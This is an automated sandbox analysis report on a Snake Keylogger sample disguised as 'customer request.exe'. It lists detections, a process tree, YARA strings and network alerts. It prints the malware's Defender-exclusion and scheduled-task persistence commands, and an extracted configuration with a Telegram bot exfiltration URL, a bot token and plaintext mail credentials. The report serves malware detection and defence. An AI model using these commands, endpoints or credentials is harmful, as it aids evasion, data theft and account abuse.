Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
customer request.exe

Overview

General Information

Sample name:customer request.exe
Analysis ID:1618311
MD5:cda26758d383d4440f407947e1bc38fe
SHA1:f159f961491285f6f02e483f65644fc8e145090e
SHA256:c2faf91bcc8b5f17406999a077c5836086be968b46ad6ff855f99f22dbb41adb
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • customer request.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\customer request.exe" MD5: CDA26758D383D4440F407947E1BC38FE)
    • powershell.exe (PID: 5344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • customer request.exe (PID: 1908 cmdline: "C:\Users\user\Desktop\customer request.exe" MD5: CDA26758D383D4440F407947E1BC38FE)
  • tjvxuavKFXO.exe (PID: 7348 cmdline: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe MD5: CDA26758D383D4440F407947E1BC38FE)
    • schtasks.exe (PID: 7436 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tjvxuavKFXO.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe" MD5: CDA26758D383D4440F407947E1BC38FE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage?chat_id=6939220311", "Username": "muhasebe@gzdled.com.tr", "Password": "Gozdeled1048", "Host": "mail.gzdled.com.tr", "Port": "587", "Token": "7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc", "Chat_id": "6939220311", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0x9816:$a1: get_encryptedPassword
  • 0x9b02:$a2: get_encryptedUsername
  • 0x9622:$a3: get_timePasswordChanged
  • 0x971d:$a4: get_passwordField
  • 0x982c:$a5: set_encryptedPassword
  • 0xae63:$a7: get_logins
  • 0xadc6:$a10: KeyLoggerEventArgs
  • 0xaa31:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x96c:$x1: $%SMTPDV$
      • 0x914:$x3: %FTPDV$
      • 0x938:$m2: Clipboard Logs ID
      • 0xb76:$m2: Screenshot Logs ID
      • 0xc86:$m2: keystroke Logs ID
      • 0xf60:$m3: SnakePW
      • 0xb4e:$m4: \SnakeKeylogger\
      0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 40 entries
        SourceRuleDescriptionAuthorStrings
        10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x14a16:$a1: get_encryptedPassword
            • 0x14d02:$a2: get_encryptedUsername
            • 0x14822:$a3: get_timePasswordChanged
            • 0x1491d:$a4: get_passwordField
            • 0x14a2c:$a5: set_encryptedPassword
            • 0x16063:$a7: get_logins
            • 0x15fc6:$a10: KeyLoggerEventArgs
            • 0x15c31:$a11: KeyLoggerEventArgsEventHandler
            10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1c55a:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x1b78c:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x1bbbf:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1cbfe:$a5: \Kometa\User Data\Default\Login Data
            10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x155d8:$s1: UnHook
            • 0x155df:$s2: SetHook
            • 0x155e7:$s3: CallNextHook
            • 0x155f4:$s4: _hook
            Click to see the 47 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", ProcessId: 5344, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", ProcessId: 5344, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe, ParentImage: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe, ParentProcessId: 7348, ParentProcessName: tjvxuavKFXO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp", ProcessId: 7436, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", ProcessId: 2084, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe", ProcessId: 5344, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\customer request.exe", ParentImage: C:\Users\user\Desktop\customer request.exe, ParentProcessId: 6848, ParentProcessName: customer request.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp", ProcessId: 2084, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T19:40:48.070862+010028033053Unknown Traffic192.168.2.449739104.21.16.1443TCP
            2025-02-18T19:40:55.731632+010028033053Unknown Traffic192.168.2.449750104.21.16.1443TCP
            2025-02-18T19:40:57.098224+010028033053Unknown Traffic192.168.2.449754104.21.16.1443TCP
            2025-02-18T19:40:59.034259+010028033053Unknown Traffic192.168.2.449758104.21.16.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T19:40:46.612846+010028032742Potentially Bad Traffic192.168.2.449736193.122.6.16880TCP
            2025-02-18T19:40:47.505160+010028032742Potentially Bad Traffic192.168.2.449736193.122.6.16880TCP
            2025-02-18T19:40:49.816049+010028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP
            2025-02-18T19:40:52.149580+010028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
            2025-02-18T19:40:52.315974+010028032742Potentially Bad Traffic192.168.2.449744193.122.6.16880TCP
            2025-02-18T19:40:53.730477+010028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
            2025-02-18T19:40:53.972228+010028032742Potentially Bad Traffic192.168.2.449746193.122.6.16880TCP
            2025-02-18T19:40:55.144102+010028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
            2025-02-18T19:40:55.184666+010028032742Potentially Bad Traffic192.168.2.449749193.122.6.16880TCP
            2025-02-18T19:40:58.472250+010028032742Potentially Bad Traffic192.168.2.449752193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T19:41:04.717048+010028530061A Network Trojan was detected192.168.2.462946149.154.167.220443TCP
            2025-02-18T19:41:16.521382+010028530061A Network Trojan was detected192.168.2.462955149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-18T19:41:04.383742+010018100081Potentially Bad Traffic192.168.2.462946149.154.167.220443TCP
            2025-02-18T19:41:16.091536+010018100081Potentially Bad Traffic192.168.2.462955149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage?chat_id=6939220311", "Username": "muhasebe@gzdled.com.tr", "Password": "Gozdeled1048", "Host": "mail.gzdled.com.tr", "Port": "587", "Token": "7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc", "Chat_id": "6939220311", "Version": "5.1"}
            Source: tjvxuavKFXO.exe.7488.13.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendMessage"}
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeReversingLabs: Detection: 29%
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeVirustotal: Detection: 35%Perma Link
            Source: customer request.exeReversingLabs: Detection: 29%
            Source: customer request.exeVirustotal: Detection: 35%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: muhasebe@gzdled.com.tr
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: Gozdeled1048
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: mail.gzdled.com.tr
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: flexcomgeneralmerchants@outlook.com
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: 587
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor:
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: 7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpackString decryptor: 6939220311

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: customer request.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49747 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62946 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62955 version: TLS 1.2
            Source: customer request.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 07A3E65Fh0_2_07A3EB8B
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 0121F1F6h8_2_0121F007
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 0121FB80h8_2_0121F007
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0121E528
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0121EB5B
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0121ED3C
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F1A38h8_2_056F1966
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F1011h8_2_056F0D60
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FF009h8_2_056FED60
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FBBE9h8_2_056FB940
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FEBB1h8_2_056FE908
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F0BB1h8_2_056F0900
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FC499h8_2_056FC1F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F1471h8_2_056F11C0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FF461h8_2_056FF1B8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FC041h8_2_056FBD98
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F02F1h8_2_056F0040
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FE301h8_2_056FE058
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FDEA9h8_2_056FDC00
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FB791h8_2_056FB4E8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F0751h8_2_056F04A0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FE759h8_2_056FE4B0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FD5F9h8_2_056FD350
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FDA51h8_2_056FD7A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FFD11h8_2_056FFA68
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FC8F1h8_2_056FC648
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F1A38h8_2_056F1620
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FF8B9h8_2_056FF610
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056F1A38h8_2_056F1610
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FD1A1h8_2_056FCEF8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 056FCD49h8_2_056FCAA0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06958945h8_2_06958608
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 069572FAh8_2_06957050
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_069536CE
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06956171h8_2_06955EC8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 069558C1h8_2_06955618
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06955D19h8_2_06955A70
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_069533B8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_069533A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06956E79h8_2_06956BD0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 069565C9h8_2_06956320
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06956A21h8_2_06956778
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06950741h8_2_06950498
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06957751h8_2_069574A8
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06950B99h8_2_069508F0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 069502E9h8_2_06950040
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06955441h8_2_06955198
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06958459h8_2_069581B0
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06957BA9h8_2_06957900
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06958001h8_2_06957D58
            Source: C:\Users\user\Desktop\customer request.exeCode function: 4x nop then jmp 06950FF1h8_2_06950D48
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 02A9F055h13_2_02A9EE68
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 02A9F9DFh13_2_02A9EE68
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_02A9E388
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_02A9EB9B
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_02A9E9BB
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05251471h13_2_052511C0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 052502F1h13_2_05250040
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05251A38h13_2_05251620
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05250BB1h13_2_05250900
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525EBB1h13_2_0525E908
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05251A38h13_2_05251966
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05251011h13_2_05250D60
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525F009h13_2_0525ED60
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525BBE9h13_2_0525B940
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525F461h13_2_0525F1B8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525C041h13_2_0525BD98
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525C499h13_2_0525C1F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525DEA9h13_2_0525DC00
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525E301h13_2_0525E058
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 05250751h13_2_052504A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525E759h13_2_0525E4B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525B791h13_2_0525B4E8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525D5F9h13_2_0525D350
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525DA51h13_2_0525D7A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525F8B9h13_2_0525F610
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525FD11h13_2_0525FA68
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525C8F1h13_2_0525C648
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525CD49h13_2_0525CAA0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 0525D1A1h13_2_0525CEF8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06968945h13_2_06968608
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_069636CE
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06966171h13_2_06965EC8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 069658C1h13_2_06965618
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06965D19h13_2_06965A70
